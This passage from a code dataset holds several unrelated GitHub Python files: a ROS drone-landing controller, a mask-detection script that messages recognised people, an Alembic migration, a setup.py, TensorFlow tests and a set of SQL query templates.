,[51,-3]]\n\nrover_goal = [[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]]\n\nflag2=0\nland = 0\nzhold = 10 # initial height, can also be taken as input\ndef sdre():\n while not rospy.is_shutdown():\n global flag2, x, y, z, roll, pitch, yaw, vel_rover, goal, goal_body, v_x, v_y, v_z, Rot_body_to_inertial, Rot_inertial_to_body, yaw2, acc_rover, v3, zhold, rover_goal, pos_rover, land\n\n ## For plots\n posn.write('%f;' % float(x))\n posn.write('%f;' % float(y))\n posn.write('%f;' % float(z))\n posn.write('%f;' % float(v_x))\n posn.write('%f;' % float(v_y))\n posn.write('%f;' % float(v_z))\n posn.write('%f;' % float(pos_rover[0]))\n posn.write('%f;' % float(pos_rover[1]))\n posn.write('%f;' % float(pos_rover[2]))\n posn.write('%f;' % float(vel_rover[0]))\n posn.write('%f;' % float(vel_rover[1]))\n posn.write('%f;' % float(vel_rover[2]))\n posn.write('\\n')\n\n ## If height > 2, follow form behind the rover, dont go too close\n if z>4:\n goal[0] = goal[0] - 2*cos(yaw2)*(1/(1+exp(-(z-6))))\n goal[1] = goal[1] - 2*sin(yaw2)*(1/(1+exp(-(z-6))))\n\n ## Hold position if not landing scenario\n if land==1:\n goal[2] = zhold\n\n print(goal, land)\n\n ## Goals are the errors here\n goal_body[0] = goal[0] - x\n goal_body[1] = goal[1] - y\n goal_body[2] = goal[2] - z\n\n ## The errors in body frame\n goal_body = np.dot(Rot_inertial_to_body,goal_body.transpose())\n\n # !!!! TEST\n # If mislanded, especially vision based, start regaining altitude\n if (sqrt(goal_body[0]**2 + goal_body[1]**2)>1 and land==0) or (detect==0):\n goal[2] = sqrt(goal[0]**2+goal[1]**2)\n\n #### Weighting Matrices Q R\n\n################################################################################\n\n######## USE THESE MATRICES FOR BASELINE CONTROL ########\n Q = np.array([[((goal_body[0])**2)/abs(0.5*goal_body[2]**2+0.0001)+10, 0, 0, 0, 0, 0, 0]\n ,[0, abs(150*(vel_rover[0]-v_x)/(0.001+0.01*abs(goal_body[0])+0.05*abs(goal_body[2]))), 0, 0, 0, 0, 0]\n ,[0, 0, ((goal_body[1])**2)/abs(0.5*goal_body[2]**2+0.0001)+10, 0, 0, 0, 0]\n ,[0, 0, 0, abs(150*(vel_rover[1]-v_x)/(0.001+0.01*abs(goal_body[1])+0.05*abs(goal_body[2]))), 0, 0, 0]\n ,[0, 0, 0, 0, 1+((30*goal_body[2])/sqrt(0.01+0.1*(goal_body[0]**2)+0.1*(goal_body[1]**2)))**2, 0, 0] #normal\n # ,[0, 0, 0, 0, 1+((10*goal_body[2]+10*(land))/sqrt(0.01+0.01*(goal_body[0]**2)+0.01*(goal_body[1]**2)))**2, 0, 0] #alt hold\n ,[0, 0, 0, 0, 0, 1/abs(goal_body[2]+0.001), 0] #normal\n # ,[0, 0, 0, 0, 0, (1-land+0.0001)/abs(goal_body[2]+0.001), 0] #alt hold\n ,[0, 0, 0, 0, 0, 0, 10/abs(goal_body[2]+0.001)]])\n\n R = np.array([[100, 0, 0, 0] #z - accn\n ,[0, 100, 0, 0] #Pitch\n ,[0, 0, 100, 0] #Roll\n ,[0, 0, 0, 300]])\n\n print(Q)\n################################################################################\n\n\n################################################################################\n\n########## USE THIS FOR VISION BASED CONTROL ########################\n # Q = np.array([[((10*goal_body[0])**2)/abs(goal_body[2]+0.0001)+50/abs(abs(goal_body[0]+0.00001)-1)+100/abs(goal_body[0]+0.00001), 0, 0, 0, 0, 0, 0]\n # ,[0, abs(20*(0.5+abs(goal_body[2]))*(vel_rover[0])/(0.001+0.01*abs(goal_body[0]+0.00001))), 0, 0, 0, 0, 0]\n # ,[0, 0, ((10*goal_body[1])**2)/abs(goal_body[2]+0.0001)+50/abs(abs(goal_body[1]+0.00001)-1)+100/abs(goal_body[1]+0.00001), 0, 0, 0, 0]\n # ,[0, 0, 0, abs(20*(0.5+abs(goal_body[2]))*(vel_rover[1])/(0.001+0.01*abs(goal_body[1]))), 0, 0, 0]\n # ,[0, 0, 0, 0, 1+(30*goal_body[2]/sqrt(0.01+0.01*(goal_body[0]**2)+0.01*(goal_body[1]**2)))**2, 0, 0] #normal\n # ,[0, 0, 0, 0, 0, 1/abs(goal_body[2]+0.001), 0] #normal\n # ,[0, 0, 0, 0, 0, 0, 10/abs(goal_body[2]+0.001)]])\n #\n # R = np.array([[800, 0, 0, 0] #z - accn\n # ,[0, 75000, 0, 0] #Pitch\n # ,[0, 0, 75000, 0] #Roll\n # ,[0, 0, 0, 2000]])\n\n\n################################################################################\n\n ## Calculation for control done in body fixed frame\n ## d2(e_x)/dt2 = 0-d2(x)/dt2 so all signs inverted\n\n ## X for baseline model as data we recieve is in global frame\n X = np.array([[goal_body[0]],[vel_rover[0]-v_x],[goal_body[1]],[vel_rover[1]-v_y],[goal_body[2]],[vel_rover[2]-v_z],[yaw2-yaw]])\n ## X for vision model as data from camera gives relative states\n # X = np.array([[goal_body[0]],[vel_rover[0]],[goal_body[1]],[vel_rover[1]],[goal_body[2]],[vel_rover[2]],[yaw2-yaw]])\n B = np.array([[0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1]])\n P = la.solve_continuous_are(A, B, Q, R)\n\n ## Riccati Equation solving\n u = np.dot(-np.linalg.inv(R),B.transpose())\n u = np.dot(u,P)\n u = np.dot(u,X)\n\n ## Inputs thrust, roll, pitch, and yaw angular velocity\n u0 = float(u[0])\n u1 = float(u[1])\n u2 = float(u[2])\n u3 = float(u[3])\n\n ## Normalizing the received thrust\n u0 = ((acc_rover[2]-u0)*1.5 + 14.7)/29.4\n u1 = (acc_rover[0]-u1)/9.8\n u2 = (u2-acc_rover[1])/9.8\n u3 = v3-u3\n\n ## Making thrust non-negative\n if u0>1:\n u0 = 1\n if u0<0:\n u0 = 0\n\n ## Restrict rotation angles to 10 deg\n if u1>10*np.pi/180:\n u1 = 10*np.pi/180\n if u1<-10*np.pi/180:\n u1 = -10*np.pi/180\n if u2>10*np.pi/180:\n u2 = 10*np.pi/180\n if u2<-10*np.pi/180:\n u2 = -10*np.pi/180\n\n if abs(yaw2-yaw+2*np.pi)0.8:\n # u3 = 0.8\n # if u3<-0.8:\n # u3 = -0.8\n\n ## Start descending for small errors\n if sqrt(goal_body[0]**2+goal_body[1]**2)<0.8 and abs(goal_body[2])<1 and land==0:\n rospy.loginfo(\"LAND\")\n u0 = 0.0\n u1 = 0.0\n u2 = 0.0\n\n\n ## Convert to quaternions and publish\n quater = tf.transformations.quaternion_from_euler(u2,u1,yaw+np.pi/2) ## yaw+pi/2 only if mavros is used !!!!\n msg.header = Header()\n msg.type_mask = 0\n msg.orientation.x = quater[0]\n msg.orientation.y = quater[1]\n msg.orientation.z = quater[2]\n msg.orientation.w = quater[3]\n msg.body_rate.x = 0.0\n msg.body_rate.y = 0.0\n msg.body_rate.z = u3\n msg.thrust = u0\n pub.publish(msg)\n\n ## Rover trajectory\n ## Change goal of rover to next waypoint\n if sqrt((pos_rover[0]-rover_goal[flag2][0])**2 + (pos_rover[1]-rover_goal[flag2][1])**2) <= 2 and flag2!=len(rover_goal)-1:\n flag2+=1\n ## Based on flag2 decide to land or track\n if flag2%2 == 0:\n land = 1\n zhold = z\n else:\n land = 0\n\n ## Desired Heading and calculation of error in heading\n ang = atan2(rover_goal[flag2][1]-pos_rover[1],rover_goal[flag2][0]-pos_rover[0])\n if abs(ang-yaw2+2*np.pi)=0.78539:\n land = 1\n zhold = z\n elif flag2%2 != 0:\n land = 0\n\n ## Turning if heading error > 0.3rad\n if abs(ang-yaw2)>=0.3:\n ## Choose direction of rotation that reduces error\n if abs(ang-(yaw2+(ang-yaw2)*0.01))0.8:\n msg2.angular.z = 0.8\n if msg2.angular.z<-0.8:\n msg2.angular.z = -0.8\n if msg2.linear.x>1.5:\n msg2.linear.x = 1.5\n\n pub2.publish(msg2)\n rate = rospy.Rate(50)\n rate.sleep\n\n################################################################################\n\n# USE THIS ONLY IF YOU WANT DATA FROM MAVROS AND NOT GAZEBO\n\ndef callback(info):\n ##MUST GET HEADING\n global x, y, z, roll, pitch, yaw, vel_rover, vel_drone_rot, vel_drone_trans, head, error_head_prev, goal, goal_body, v_x, v_y, v_z, Rot_body_to_inertial, Rot_inertial_to_body\n\n ## Positions in global gazebo frame\n x = info.pose.pose.position.y\n y = -info.pose.pose.position.x\n z = info.pose.pose.position.z\n\n ## All linear velocities are local\n v_x = info.twist.twist.linear.x\n v_y = info.twist.twist.linear.y\n v_z = info.twist.twist.linear.z\n\n ## Orientations in order of rotation\n a1 = info.pose.pose.orientation.x\n b1 = info.pose.pose.orientation.y\n c1 = info.pose.pose.orientation.z\n d1 = info.pose.pose.orientation.w\n\n # roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n\n ### Yaw in gazebo frame\n # yaw = yaw-np.pi/2\n\n Rot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]\n ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]\n ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])\n Rot_inertial_to_body = Rot_body_to_inertial.transpose()\n################################################################################\n\n\n################################################################################\n\n# ONLY FOR THE BASELINE MODEL\n\ndef callback2(info):\n global x, y, z, v_x, v_y, v_z, roll, pitch, yaw, goal, vel_rover, acc_rover, Rot_body_to_inertial, Rot_inertial_to_body, yaw2, now_p, v1_p, v2_p, v3, pos_rover\n now = rospy.get_time()\n\n if now-now_p == 0:\n pass\n else:\n ############################################################################\n # USE THIS ONLY IF YOU WANT TO GET DATA FROM GAZEBO, VELOCITY MUST BE CHECKED IF IN BODY FRAME\n\n # ## Drone information\n # x = info.pose[1].position.x\n # y = info.pose[1].position.y\n # z = info.pose[1].position.z\n #\n # v_x = info.twist[1].linear.x\n # v_y = info.twist[1].linear.y\n # v_z = info.twist[1].linear.z\n #\n # a1 = info.pose[1].orientation.x\n # b1 = info.pose[1].orientation.y\n # c1 = info.pose[1].orientation.z\n # d1 = info.pose[1].orientation.w\n # roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n #\n # Rot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]\n # ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]\n # ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])\n # Rot_inertial_to_body = Rot_body_to_inertial.transpose()\n\n ############################################################################\n\n ## Drone orientations alone\n a1 = info.pose[1].orientation.x\n b1 = info.pose[1].orientation.y\n c1 = info.pose[1].orientation.z\n d1 = info.pose[1].orientation.w\n roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n\n ## Rover information\n pos_rover[0] = info.pose[2].position.x\n pos_rover[1] = info.pose[2].position.y\n goal[0] = info.pose[2].position.x+8 ## adding initial UAV position to get in mavros frame\n goal[1] = info.pose[2].position.y+0 ## adding initial UAV position to get in mavros frame\n goal[2] = 0.435\n\n a1 = info.pose[2].orientation.x\n b1 = info.pose[2].orientation.y\n c1 = info.pose[2].orientation.z\n d1 = info.pose[2].orientation.w\n roll2, pitch2, yaw2 = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n\n ## Receive vel info and convert to body fixed frame\n v1 = info.twist[2].linear.x\n v2 = info.twist[2].linear.y\n v3 = info.twist[2].angular.z\n\n ## Calculate acceleration\n a1 = (v1-v1_p)/(now-now_p)\n a2 = (v2-v2_p)/(now-now_p)\n now_p = rospy.get_time()\n\n v = np.array([[v1]\n ,[v2]\n ,[0.0]])\n\n a = np.array([[a1]\n ,[a2]\n ,[0.0]])\n\n ## Converting from W to B\n v = np.dot(Rot_inertial_to_body, v)\n a = np.dot(Rot_inertial_to_body, a)\n\n vel_rover[0] = float(v[0])\n vel_rover[1] = float(v[1])\n vel_rover[2] = float(v[2])\n acc_rover[0] = float(a[0])\n acc_rover[1] = float(a[1])\n acc_rover[2] = float(a[2])\n v1_p = v1\n v2_p = v2\n################################################################################\n\n################################################################################\n\n# ONLY FOR VISION MODEL\n\n# def ReceiveTar(info):\n# global goal, vel_rover, Rot_inertial_to_body, now, now_p2, detect\n#\n# ## Receive position info\n# goal[0] = info.goal.x\n# goal[1] = info.goal.y\n# goal[2] = 0.435-z\n# detect = info.detected\n#\n# ## Receive vel info and convert to body fixed frame\n# v1 = info.vel.x\n# v2 = info.vel.y\n# v = np.array([[v1]\n# ,[v2]\n# ,[0.0-v_z]])\n# v = np.dot(Rot_inertial_to_body, v)\n# vel_rover[0] = float(v[0])\n# vel_rover[1] = float(v[1])\n# vel_rover[2] = float(v[2])\n\n################################################################################\n\ndef listener():\n # rospy.Subscriber('/kalman_filter', kalman, ReceiveTar) ## If using vision\n rospy.Subscriber(\"/gazebo/model_states\", ModelStates, callback2) ## If baseline model\n rospy.Subscriber(\"/drone0/mavros/local_position/odom\", Odometry, callback)\n sdre()\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n listener()\n except rospy.ROSInterruptException:\n posn.close()\n pass\n","repo_name":"rishabbala/SDRE-based-Cooperative-UAV-Landing-on-High-speed-targets","sub_path":"quadcopter/script/single_UAV.py","file_name":"single_UAV.py","file_ext":"py","file_size_in_byte":19404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"39947786566","text":"# import the necessary packages\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\nfrom imutils.video import VideoStream\nfrom datetime import datetime\nfrom twilio.rest import Client \nimport numpy as np\nimport imutils\nimport face_recognition\nimport time\nimport cv2\nimport os\nimport requests\nimport json\nimport secretKey\nimport smtplib\n\n#connecting to mail server \n\nserver = smtplib.SMTP()\nserver._host = \"smtp.gmail.com\"\nserver.connect(\"smtp.gmail.com\",587)\nserver.ehlo()\nserver.starttls()\nserver.ehlo()\n\nserver.login(secretKey.MY_MAIL_ADDRESS , secretKey.MY_MAIL_PASSWORD)\n\n\nf = open('data.json', 'r')\ndata = json.load(f)\ndata = data[\"data\"]\n\n\n\ndef findEncoding(images):\n\tencodeList = []\n\tfor img in images:\n\t\tcurImg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\t\tencode = face_recognition.face_encodings(img)[0]\n\t\tencodeList.append(encode)\n\treturn encodeList\n\n\npath = 'knownImage'\nimages = []\ncontactNumber = []\nmailArr = []\nname = []\nmyList = os.listdir(path)\n\nfor img in myList:\n\tcurImg = cv2.imread(f'{path}/{img}')\n\timages.append(curImg)\n\tindex = os.path.splitext(img)[0]\n\tindex = int(index)\n\tcontactNumber.append(data[index]['contact'])\n\tmailArr.append(data[index]['mail'])\n\tname.append(data[index]['name'])\n\nencodeList = findEncoding(images)\n\n\n\ndef detect_and_predict_mask(frame, faceNet, maskNet):\n\t# grab the dimensions of the frame and then construct a blob\n\t# from it\n\t(h, w) = frame.shape[:2]\n\tblob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224),\n\t\t(104.0, 177.0, 123.0))\n\n\t# pass the blob through the network and obtain the face detections\n\tfaceNet.setInput(blob)\n\tdetections = faceNet.forward()\n\tprint(detections.shape)\n\n\t# initialize our list of faces, their corresponding locations,\n\t# and the list of predictions from our face mask network\n\tfaces = []\n\tlocs = []\n\tpreds = []\n \n\t# loop over the detections\n\tfor i in range(0, detections.shape[2]):\n\t\tconfidence = detections[0, 0, i, 2]\n\t\tif confidence > 0.5:\n\t\t\tbox = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\n\n\t\t\t(startX, startY) = (max(0, startX), max(0, startY))\n\t\t\t(endX, endY) = (min(w - 1, endX), min(h - 1, endY))\n\n\t\t\t\n\t\t\tface = frame[startY:endY, startX:endX]\n\t\t\tface = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n\t\t\tface = cv2.resize(face, (224, 224))\n\t\t\tface = img_to_array(face)\n\t\t\t\n\t\t\tface = preprocess_input(face)\n\n\t\t\n\t\t\tfaces.append(face)\n\t\t\tlocs.append((startX, startY, endX, endY))\n\n\t# only make a predictions if at least one face was detected\n\tif len(faces) > 0:\n\t\t\n\t\tfaces = np.array(faces, dtype=\"float32\")\n\t\tpreds = maskNet.predict(faces, batch_size=32)\n\n\t# return a 2-tuple of the face locations and their corresponding\n\t# locations\n\treturn (locs, preds)\n\n\n\n\n# load our serialized face detector model from disk\nprototxtPath = r\"face_detector\\deploy.prototxt\"\nweightsPath = r\"face_detector\\res10_300x300_ssd_iter_140000.caffemodel\"\nfaceNet = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n# load the face mask detector model frqqom disk\nmaskNet = load_model(\"mask_detector.model\")\n\n\n\n# initialize the video stream\nprint(\"[INFO] starting video stream...\")\nvs = VideoStream(src=0).start()\n\n# loop over the frames from the video stream\ncnt = 0 \n\n\ndef sendTheMessage(contactNumber, mail , name):\n\twith open('sheet.csv' , 'r+') as file: \n\t\tmyDataList = file.readlines()\n\t\tcontactList = []\n\t\t\n\n\t\tfor contact in myDataList:\n\t\t\tentry = contact.split(',')\n\t\t\tcontactList.append(entry[0])\n\n\t\tif contactNumber not in contactList:\n\t\t\ttime = datetime.now()\n\t\t\tdtString = time.strftime('%H:%M:%S')\n\n\t\t\tfile.writelines(f'\\n{contactNumber},{name},{mail},{dtString}')\n\n\t\t\tclient = Client(secretKey.ACCOUNT_SID , secretKey.AUTH_TOKEN)\n\t\t\ttextMsg = \"Dear \" + name +\",\\n\\n\"+ \"We have detected that you have not wear mask in public place. Please wear your mask otherwise you will be fined.\"\n\t\t\tif len(contactNumber)>11: \n\t\t\t\tmessage = client.messages.create(\n\t\t\t\t\tbody = textMsg,\n\t\t\t\t\tfrom_ = secretKey.TWILIO_NUMBER,\n\t\t\t\t\tto = contactNumber\n\t\t\t\t\t)\n\t\t\t\tprint(message.body)\n\t\t\telse:\n\t\t\t\tprint(contactNumber+\" is not verified by twilio\")\n\t\t\tSUBJECT = \"Warning regarding COVID-19\"\n\t\t\tmessage = 'Subject: {}\\n\\n{}'.format(SUBJECT, textMsg)\n\t\t\tserver.sendmail(secretKey.MY_MAIL_ADDRESS, mail , message)\n\n\n\n\nwhile True:\n\n\tframe = vs.read()\n\tframe = imutils.resize(frame, width=400)\n\timgS = cv2.cvtColor(frame , cv2.COLOR_BGR2RGB)\n\n\tfacesCurFrame = face_recognition.face_locations(imgS)\n\tencode = face_recognition.face_encodings(imgS , facesCurFrame)\n\n\n\tfor encodeFace , FaceLoc in zip(encode , facesCurFrame):\n\t\tmatches = face_recognition.compare_faces(encodeList , encodeFace)\n\t\tfaceDist = face_recognition.face_distance(encodeList , encodeFace)\n\t\t\n\t\tmatchIndex = np.argmin(faceDist)\n\t\tif matches[matchIndex] and contactNumber[matchIndex] and mailArr[matchIndex]:\n\t\t\tcontact = contactNumber[matchIndex]\n\t\t\tmail = mailArr[matchIndex]\n\t\t\tName = name[matchIndex]\n\t\t\tsendTheMessage(contact , mail, Name)\n\n\n\t(locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet)\n\tfor (box, pred) in zip(locs, preds):\n\t\t(startX, startY, endX, endY) = box\n\t\t(mask, withoutMask) = pred\n\n\t\tlabel = \"Mask\" if mask > withoutMask else \"No Mask\"\n\t\tcolor = (0, 255, 0) if label == \"Mask\" else (0, 0, 255)\n\n\t\tlabel = \"{}: {:.2f}%\".format(label, max(mask, withoutMask) * 100)\n\n\t\tcv2.putText(frame, label, (startX, startY - 10),\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)\n\t\tcv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n\n\tcv2.imshow(\"Frame\", frame)\n\tkey = cv2.waitKey(1) & 0xFF\n\n\t# if the `q` key was pressed, break from the loop\n\tif key == ord(\"q\"):\n\t\tbreak\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()","repo_name":"I-E-T-Lucknow/B.Tech-CS----2022","sub_path":"05_Grp_DetectPeopleNotFollowingCovidNorms/code/detect_mask_video.py","file_name":"detect_mask_video.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"34"} +{"seq_id":"36042834532","text":"\"\"\"create downloadables table\n\nRevision ID: 583c79074d1f\nRevises: 817f06a069ae\nCreate Date: 2022-04-04 18:18:03.735338\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '583c79074d1f'\ndown_revision = '817f06a069ae'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'tbl_downloadfiles',\n sa.Column('id',sa.Integer,primary_key=True),\n sa.Column('parameter',sa.String(255)),\n sa.Column('filename_on_blob',sa.String(255))\n )\n\n\ndef downgrade():\n op.drop_table('tbl_downloadfiles')\n","repo_name":"mmsmdali/dicra","sub_path":"src/api/alembic/versions/583c79074d1f_create_downloadables_table.py","file_name":"583c79074d1f_create_downloadables_table.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"13115214110","text":"import re\n\nfrom setuptools import setup\n\n\nwith open(\"mypy2junit.py\", \"rt\", encoding=\"utf8\") as f:\n version = re.search(r'__version__ = \\'(.*?)\\'', f.read()).group(1)\n\nwith open(\"README.md\", \"rt\", encoding=\"utf8\") as f:\n readme = f.read()\n\nsetup(\n name=\"mypy2junit\",\n version=version,\n url=\"https://github.com/Dundee/mypy2junit\",\n license=\"BSD-3-Clause\",\n author=\"Daniel Milde\",\n author_email=\"daniel@milde.cz\",\n description=\"Script for converting output from MyPy to Junit XML format\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n classifiers=[\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n ],\n #packages=find_packages(\"mypy2junit\"),\n py_modules=[\"mypy2junit\"],\n python_requires=\">=3.5\",\n entry_points={\"console_scripts\": [\"mypy2junit = mypy2junit:main\"]},\n extras_require={\n \"dev\": [\n \"pytest\",\n ],\n },\n)\n","repo_name":"dundee/mypy2junit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"3897154386","text":"\"\"\"\nTests for taqtoe.model.graph\n\"\"\"\n# Prevents TensorFlow logs from polluting Nose tests\n# (without setting an environment variable)\nimport logging\nlogging.getLogger(\"tensorflow\").setLevel(logging.WARNING)\n\nfrom unittest import TestCase\n\nimport tensorflow as tf\nfrom nose.tools import assert_raises, assert_equal, assert_not_equal\n\nfrom taqtoe.model.config import default_config\nfrom taqtoe.model.graph import TicTacToeDQNGraph\n\n\nclass TestTicTacToeDQNGraphTrain(TestCase):\n def setUp(self):\n self.dqn_graph = TicTacToeDQNGraph(default_config)\n\n def test_target_online_variables(self):\n online_vars = self.dqn_graph.get_online_variables()\n target_vars = self.dqn_graph.get_target_variables()\n # Make sure they are the same length\n assert_equal(len(online_vars), len(target_vars))\n # Make sure that there is no overlap between online and target vars\n for var in online_vars:\n assert var not in target_vars\n\n def test_build_inputs(self):\n boards, processed_inputs = self.dqn_graph.build_inputs()\n # Check to make sure that types are correct\n assert_equal(boards.op.type, 'Placeholder')\n assert_equal(type(processed_inputs), tf.Tensor)\n # Check to make sure that the shapes of the inputs are correct\n assert_equal(boards.get_shape().as_list(), [None, 3, 3])\n assert_equal(processed_inputs.get_shape().as_list(), [None, 3, 3, 1])\n\n\nclass TestTicTacToeDQNGraphInfer(TestCase):\n def setUp(self):\n self.dqn_graph = TicTacToeDQNGraph(default_config)","repo_name":"samjabrahams/taqtoe","sub_path":"taqtoe/tests/model/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39642885738","text":"TABLES = {}\nTABLES['datasource'] = \"\"\"\nCREATE TABLE IF NOT EXISTS datasource(\n id INT AUTO_INCREMENT PRIMARY KEY NOT NULL,\n extracted TINYINT(1) NOT NULL,\n category VARCHAR(100) NOT NULL,\n category_label VARCHAR(100) NOT NULL,\n label VARCHAR(200) NOT NULL,\n type VARCHAR(20) NOT NULL,\n n INT NOT NULL,\n size INT,\n download_size INT,\n url VARCHAR(400) NOT NULL,\n filename VARCHAR(100) NOT NULL,\n file_ext VARCHAR(10) NOT NULL,\n active TINYINT(1) NOT NULL,\n download_start DATETIME,\n download_end DATETIME,\n download_duration INT,\n updated DATETIME\n)\n\"\"\"\n\nTABLES['dataset'] = \"\"\"\nCREATE TABLE IF NOT EXISTS dataset(\n id INT AUTO_INCREMENT PRIMARY KEY NOT NULL,\n stage VARCHAR(10) NOT NULL,\n filename VARCHAR(100) NOT NULL,\n category VARCHAR(100) NOT NULL,\n type VARCHAR(100) NOT NULL,\n n INT NOT NULL,\n size INT,\n created DATETIME,\n updated DATETIME\n)\n\"\"\"\n\nSEQUEL = {}\nSEQUEL['datasource'] = {\n 'create_table':\n {\n 'name': 'create_table',\n 'description': 'Creates the datasource table',\n 'table': 'datasource',\n 'qtype': 'create_table',\n 'sql': TABLES['datasource'],\n },\n 'select_all':\n {\n 'name': 'select_all',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource\"\"\"\n },\n 'select_category':\n {\n 'name': 'select_category',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource WHERE category = %s\"\"\"\n },\n 'select_url':\n {\n 'name': 'select_url',\n 'description': 'Select url from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT url from datasource WHERE id = %s\"\"\"\n },\n 'select_active':\n {\n 'name': 'select_active',\n 'description': 'Select active from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT active from datasource WHERE id = %s\"\"\"\n },\n 'select_type':\n {\n 'name': 'select_type',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource WHERE type = %s\"\"\",\n },\n 'select_category_type':\n {\n 'name': 'select_category_type',\n 'description': 'Select all data from datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT * from datasource WHERE category = %s AND type = %s\"\"\",\n },\n 'select_count':\n {\n 'name': 'select_count',\n 'description': 'Select the number of rows in the datasource table',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT COUNT(*) from datasource\"\"\",\n },\n 'select_size':\n {\n 'name': 'select_size',\n 'description': 'Select the size of a datasource',\n 'table': 'datasource',\n 'qtype': 'select',\n 'sql': \"\"\"SELECT size from datasource WHERE id = %s\"\"\",\n },\n 'insert':\n {\n 'name': 'insert_datasource',\n 'description': 'Insert data into the datasource table.',\n 'table': 'datasource',\n 'qtype': 'insert',\n 'sql': \"\"\"INSERT INTO datasource (extracted, category, category_label, label, type, n, url, filename, file_ext, active) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\",\n },\n 'update':\n {\n 'size':\n {\n 'name': 'update_size',\n 'description': 'Update the size of a datasource.',\n 'table': 'datasource',\n 'qtype': 'update',\n 'sql': \"\"\"UPDATE datasource SET size = %s WHERE id = %s\"\"\",\n },\n 'download':\n {\n 'name': 'download_update',\n 'description': 'Update datasource download metadata.',\n 'table': 'datasource',\n 'qtype': 'update',\n 'sql': \"\"\"UPDATE datasource SET\n download_size = %s,\n download_start = %s,\n download_end = %s,\n download_duration = %s,\n updated = %s\n WHERE id = %s\"\"\"\n },\n 'active':\n {\n 'name': 'update_active',\n 'description': 'Update the datasource active variable.',\n 'table': 'datasource',\n 'qtype': 'update',\n 'sql': \"\"\"UPDATE datasource SET active = %s WHERE id = %s\"\"\"\n }\n },\n 'drop':\n {\n 'name': 'drop',\n 'description': 'Drop datasource table.',\n 'table': 'datasource',\n 'qtype': 'drop',\n 'sql': \"\"\"DROP TABLE IF EXISTS datasource\"\"\",\n },\n 'delete':\n {\n 'name': 'delete',\n 'description': 'Delete from datasource table.',\n 'table': 'datasource',\n 'qtype': 'delete',\n 'sql': \"\"\"DELETE FROM datasource WHERE id = %s\"\"\",\n },\n 'exists':\n {\n 'name': 'exists',\n 'description': 'Checks existence of row in datasource table based on 